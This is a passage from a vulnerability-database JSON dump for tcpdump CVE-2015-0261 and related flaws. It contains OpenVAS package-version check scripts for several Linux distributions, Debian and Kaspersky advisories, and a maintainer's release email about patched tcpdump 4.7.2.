"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for tcpdump USN-2580-1\n#\n# 
Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842179\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-28 05:17:00 +0200 (Tue, 28 Apr 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for tcpdump USN-2580-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tcpdump'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that tcpdump incorrectly\nhandled printing certain packets. 
A remote attacker could use this issue to cause\ntcpdump to crash, resulting in a denial of service, or possibly execute arbitrary\ncode.\n\nIn the default installation, attackers would be isolated by the tcpdump\nAppArmor profile.\");\n script_tag(name:\"affected\", value:\"tcpdump on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2580-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2580-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.6.2-1ubuntu1.2\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.5.1-2ubuntu1.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.2.1-1ubuntu2.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:31:43", "bulletinFamily": 
"scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120040", "title": "Amazon Linux Local Check: ALAS-2015-557", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-557.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120040\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:15:56 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-557\");\n script_tag(name:\"insight\", value:\"Integer signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value. (CVE-2015-0261 )The osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value. 
(CVE-2015-2154 )\");\n script_tag(name:\"solution\", value:\"Run yum update tcpdump to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-557.html\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.0.0~3.20090921gitdf3cb4.2.10.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tcpdump-debuginfo\", rpm:\"tcpdump-debuginfo~4.0.0~3.20090921gitdf3cb4.2.10.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:29", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869148", "title": "Fedora Update for tcpdump FEDORA-2015-4939", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n#\n# Fedora Update for tcpdump FEDORA-2015-4939\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869148\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:30 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\",\n \"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4939\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for\nmonitoring network traffic. 
Tcpdump can capture and display the packet headers\non a particular network interface or on all interfaces. Tcpdump can display all\nof the packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4939\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153834.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.7.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:48", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-04-19T00:00:00", "id": "OPENVAS:1361412562310869254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869254", "title": "Fedora Update for tcpdump FEDORA-2015-4953", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump 
FEDORA-2015-4953\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869254\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-19 06:54:36 +0200 (Sun, 19 Apr 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\",\n \"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4953\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a 
particular\nnetwork interface or on all interfaces. Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4953\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154808.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.5.1~4.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-23T15:07:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the 'tcpdump' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310871861", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871861", "title": "RedHat Update for tcpdump RHSA-2017:1871-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_1871-01_tcpdump.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# 
RedHat Update for tcpdump RHSA-2017:1871-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871861\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:08 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\",\n \"CVE-2016-7922\", \"CVE-2016-7923\", \"CVE-2016-7924\", \"CVE-2016-7925\",\n \"CVE-2016-7926\", \"CVE-2016-7931\", \"CVE-2016-7936\", \"CVE-2016-7973\",\n \"CVE-2016-7927\", \"CVE-2016-7928\", \"CVE-2016-7929\", \"CVE-2016-7930\",\n \"CVE-2016-7932\", \"CVE-2016-7933\", \"CVE-2016-7934\", \"CVE-2016-7935\",\n \"CVE-2016-7937\", \"CVE-2016-7938\", \"CVE-2016-7939\", \"CVE-2016-7940\",\n \"CVE-2016-7974\", \"CVE-2016-7975\", \"CVE-2016-7983\", \"CVE-2016-7984\",\n \"CVE-2016-7985\", \"CVE-2016-8575\", \"CVE-2017-5341\", \"CVE-2017-5485\",\n \"CVE-2016-7986\", \"CVE-2016-7992\", \"CVE-2016-7993\", \"CVE-2016-8574\",\n \"CVE-2017-5202\", \"CVE-2017-5203\", 
\"CVE-2017-5204\", \"CVE-2017-5205\",\n \"CVE-2017-5342\", \"CVE-2017-5482\", \"CVE-2017-5483\", \"CVE-2017-5484\",\n \"CVE-2017-5486\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for tcpdump RHSA-2017:1871-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tcpdump'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The tcpdump packages contain the tcpdump\n utility for monitoring network traffic. The tcpdump utility can capture and\n display the packet headers on a particular network interface or on all\n interfaces. The following packages have been upgraded to a later upstream\n version: tcpdump (4.9.0). (BZ#1422473) Security Fix(es): * Multiple out of\n bounds read and integer overflow vulnerabilities were found in tcpdump affecting\n the decoding of various protocols. An attacker could create a crafted pcap file\n or send specially crafted packets to the network segment where tcpdump is\n running in live capture mode (without -w) which could cause it to display\n incorrect data, crash or enter an infinite loop. 
(CVE-2015-0261, CVE-2015-2153,\n CVE-2015-2154, CVE-2015-2155, CVE-2016-7922, CVE-2016-7923, CVE-2016-7924,\n CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929,\n CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934,\n CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939,\n CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983,\n CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993,\n CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204,\n CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483,\n CVE-2017-5484, CVE-2017-5485, CVE-2017-5486) Red Hat would like to thank the\n Tcpdump project for reporting CVE-2016-7922, CVE-2016-7923, CVE-2016-7924,\n CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929,\n CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934,\n CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939,\n CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983,\n CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993,\n CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204,\n CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483,\n CVE-2017-5484, CVE-2017-5485, and CVE-2017-5486. Additional Changes: For\n detailed information on changes in this release, see the Red Hat Enterprise\n Linux 7.4 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"tcpdump on Red Hat Enterprise Linux Server (v. 
7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:1871-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00005.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.9.0~5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcpdump-debuginfo\", rpm:\"tcpdump-debuginfo~4.9.0~5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:05", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3193-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMarch 17, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tcpdump\nCVE ID : CVE-2015-0261 CVE-2015-2153 CVE-2015-2154 CVE-2015-2155\n\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\nnetwork traffic analyzer. 
These vulnerabilities might result in denial\nof service (application crash) or, potentially, execution of arbitrary\ncode.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-4.\n\nWe recommend that you upgrade your tcpdump packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-03-17T14:49:10", "published": "2015-03-17T14:49:10", "id": "DEBIAN:DSA-3193-1:51CD5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00078.html", "title": "[SECURITY] [DSA 3193-1] tcpdump security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:56", "bulletinFamily": "unix", "description": "Package : tcpdump\nVersion : tcpdump_4.1.1-1+deb6u2\nCVE ID : CVE-2015-0261 CVE-2015-2154 CVE-2015-2155\n\nSeveral issues have been discovered with tcpdump in the way it\nhandled some printer protocols. 
Those issues can lead to denial\nof service, or, potentially, execution of arbitrary code.\n\nCVE-2015-0261\n\n Missing bounds checks in IPv6 Mobility printer\n\nCVE-2015-2154\n\n Missing bounds checks in ISOCLNS printer\n\nCVE-2015-2155\n\n Missing bounds checks in ForCES printer\n\n\nThanks to Romain Fran\u00e7oise who prepared this update.\n-- \nRapha\u00ebl Hertzog \u25c8 Debian Developer\n\nSupport Debian LTS: http://www.freexian.com/services/debian-lts.html\nLearn to master Debian: http://debian-handbook.info/get/\n", "modified": "2015-03-17T09:57:59", "published": "2015-03-17T09:57:59", "id": "DEBIAN:DLA-174-1:F5DF3", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201503/msg00011.html", "title": "[SECURITY] [DLA 174-1] tcpdump security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2019-02-13T16:35:13", "bulletinFamily": "info", "description": "### *Detect date*:\n03/24/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in tcpdump. Malicious users can exploit these vulnerabilities to cause denial of service.\n\n### *Affected products*:\ntcpdump versions earlier than 4.7.2\n\n### *Solution*:\nUpdate to latest version! 
\n[Get tcpdump](<http://www.tcpdump.org/#latest-release>)\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[tcpdump](<https://threats.kaspersky.com/en/product/tcpdump/>)\n\n### *CVE-IDS*:\n[CVE-2015-0261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0261>) \n[CVE-2015-2155](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2155>) \n[CVE-2015-2154](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2154>) \n[CVE-2015-2153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2153>)", "modified": "2019-02-06T00:00:00", "published": "2015-03-24T00:00:00", "id": "KLA10498", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10498", "title": "\r KLA10498Denial of service vulnerabilities in tcpdump ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n\r\nHi, please find tcpdump 4.7.2 source code at:\r\n http://www.ca.tcpdump.org/beta/tcpdump-4.7.2.tar.gz\r\n http://www.ca.tcpdump.org/beta/tcpdump-4.7.2.tar.gz.sig\r\n (there is also a matching libpcap)\r\n\r\nTo validate the source code with the "make check" you need to have\r\nlibpcap-4.7.2 or the geneve test cases will not function.\r\nThe signature files are made by mcr@sandelman.ca, and will get replaced\r\nwith tcpdump ones once I get physical access to the key later today.\r\n\r\nThis fixes CVE-2014-9140 --- issue with PPP printer (previously notified)\r\n CVE-2015-0261 --- issues with IPv6 mobility printer.\r\n CVE-2015-2153 --- issue with tcp printer.\r\n CVE-2015-2154 --- issue with ethernet printer.\r\n CVE-2015-2155 --- issue with force printer.\r\n\r\nThere are also other issues which related to Capsicum that were\r\nalready public, as well as DECNET fixes that came in.\r\nOur tcpdump 4.7.0 process failed (flailed?) over CVE-2014-9140,\r\nand was never properly released. 
4.7.1 was internally marked, but not\r\nreleased.\r\n\r\nA patch for tcpdump 4.3 is at:\r\n http://www.ca.tcpdump.org/cve/\r\n\r\n0001-in-some-cases-we-expect-tcpdump-to-fail-with-an-erro.patch\r\n0002-test-case-files-for-CVE-2015-2153-2154-2155.patch\r\n0003-test-case-for-cve2015-0261-corrupted-IPv6-mobility-h.patch\r\n\r\nIf you require patches for other versions, please let us know.\r\n\r\nPatch 0001 is needed only so that "make check" will function.\r\n(tcpdump 4.3 may not detect libssl properly since ssl churn, so the ESP/IKE\r\ntest cases will fail since libssl was not detected)\r\n\r\nPlease ACK this email, and let me know when I can let this source code out.\r\n\r\n-- ] Never tell me the odds! | ipv6 mesh networks [ ] Michael Richardson, Sandelman Software Works | network architect [ ] mcr@sandelman.ca http://www.sandelman.ca/ | ruby on rails [\r\n\r\n", "modified": "2015-03-16T00:00:00", "published": "2015-03-16T00:00:00", "id": "SECURITYVULNS:DOC:31791", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31791", "title": "tcpdump 4.7.2 remote crashes", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "description": "Multiple vulnerabilities in protocols dissectors.", "modified": "2015-03-16T00:00:00", "published": "2015-03-16T00:00:00", "id": "SECURITYVULNS:VULN:14315", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14315", "title": "tcpdump multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:34", "bulletinFamily": "unix", "description": "It was discovered that tcpdump incorrectly handled printing certain packets. 
